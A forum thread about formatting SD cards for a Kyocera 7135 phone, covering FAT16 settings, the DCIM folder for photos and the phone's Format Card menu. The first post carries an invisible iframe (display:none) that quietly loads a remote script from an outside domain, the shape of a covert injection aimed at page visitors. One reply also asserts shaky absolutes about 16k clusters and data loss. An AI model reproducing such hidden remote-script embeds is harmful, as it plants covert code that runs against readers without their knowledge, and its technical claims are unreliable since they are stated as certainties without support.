+ Reply to Thread

Thread: Format SD

Format SD

Does an SD Card always have to be formatted before being used, even if it is to store photos? If so, I assume formatting is generally just a one time event and is done through Windows Explorer (right click/format). Is this right? Once formatted is it as simple as drag and drop (assuming we are not talking about MP3's)?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You should format the card with the phone itself. You may have lockup problems if you don't. You can drag and drop MP3s as long as you create a directy called AUDIO to hold them. Pictures are a different matter as it looks for a directory structured like a digital camera does it. Supposedly if you have a camera that uses SD cards, you can put the card right in the phone and view the pictures. I haven't tried it since my cameras take CF or SM cards.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites
    Supposedly if you have a camera that uses SD cards, you can put the card right in the phone and view the pictures.
    You can only do this with PhotoView, not PhotoSuite. Both come on the 7135 CD-ROM. PhotoView will view pictures right off the card as is, PhotoSuite requires you to convert them first using the PhotoSuite desktop software.

Originally posted by davemayo
    You can only do this with PhotoView, not PhotoSuite. Both come on the 7135 CD-ROM. PhotoView will view pictures right off the card as is, PhotoSuite requires you to convert them first using the PhotoSuite desktop software.
    Will PhotoView work if all I do is drag and drop pictures from my desktop to the SD by using Windows Explorer and Cruzer? Also, how do I format an SD card with the phone itself?

Originally posted by RMSko
    Will PhotoView work if all I do is drag and drop pictures from my desktop to the SD by using Windows Explorer and Cruzer? Also, how do I format an SD card with the phone itself?
    PhotoView will display the pictures automatically if they are located in a directory called /DCIM which is the name of the directory that all digital cameras use. I don't think you can format the card in the phone itself, but I'm not sure.

Originally posted by tmwebsites
    You should format the card with the phone itself.
    How is that done?

The reason they all say "format the SD card with the device" is because windows usually picks strange defaults and those defaults generally are incompatible with the format the devices expect.

This should be followed for all SD cards from 8MB to 1GB.

Here are the correct parameters:
    [list=1][*]1 Active primary partition that consumes the entire device.[*]A valid MBR, Boot Sector, can be added to make the device bootable.[*]FAT16[*]16k (16384 byte) clusters.[/list=1]

It MUST be 16k clusters. Any larger and half your data might never get written. Any less, and the device may not store the data correctly, or worse yet, adding data will corrupt the existing data.

The 16k limitation comes from the way the NAND flash memory works. This type of memory is the core of most memory cards (MemoryStick, SD, MMC, SM, xD).

Originally posted by burble
    The reason they all say "format the SD card with the device" is because windows usually picks strange defaults and those defaults generally are incompatible with the format the devices expect.

This should be followed for all SD cards from 8MB to 1GB.

Here are the correct parameters:
    [list=1][*]1 Active primary partition that consumes the entire device.[*]A valid MBR, Boot Sector, can be added to make the device bootable.[*]FAT16[*]16k (16384 byte) clusters.[/list=1]

It MUST be 16k clusters. Any larger and half your data might never get written. Any less, and the device may not store the data correctly, or worse yet, adding data will corrupt the existing data.

The 16k limitation comes from the way the NAND flash memory works. This type of memory is the core of most memory cards (MemoryStick, SD, MMC, SM, xD).
    Burble - thanks for the post. However, I am new to SD cards and was hoping to get a basic tutorial on the steps I must take to format the card when in the phone. I assume it is done in file manager, but what do I actually do?

Tap "Card Info" on Palm Screen
    Tap dropdown menu
    Tap Format Card
    Done

SD formatting hell

Help!

I've just got the phone (thank you GetConnected.com), and so far everything's great except the SD card. I bought two, one Sandisk 128MB and one PNY 128MB. I get the same problem with both - if I format them in the phone, I get strange things.

For example, I took the SanDisk, erased everything on it via my PC (SanDisk Imagemate connection). Put it in the 7135, still blank, like 4k used out of 120MB - OK. From Card Manager I chose "Format Card". I get the formatting message, then when it stops it shows 24.8MB free of 120MB. The card now has a PALM folder, and two junk files (Ascii boxes instead of names).

Anyone seen this before?

Chip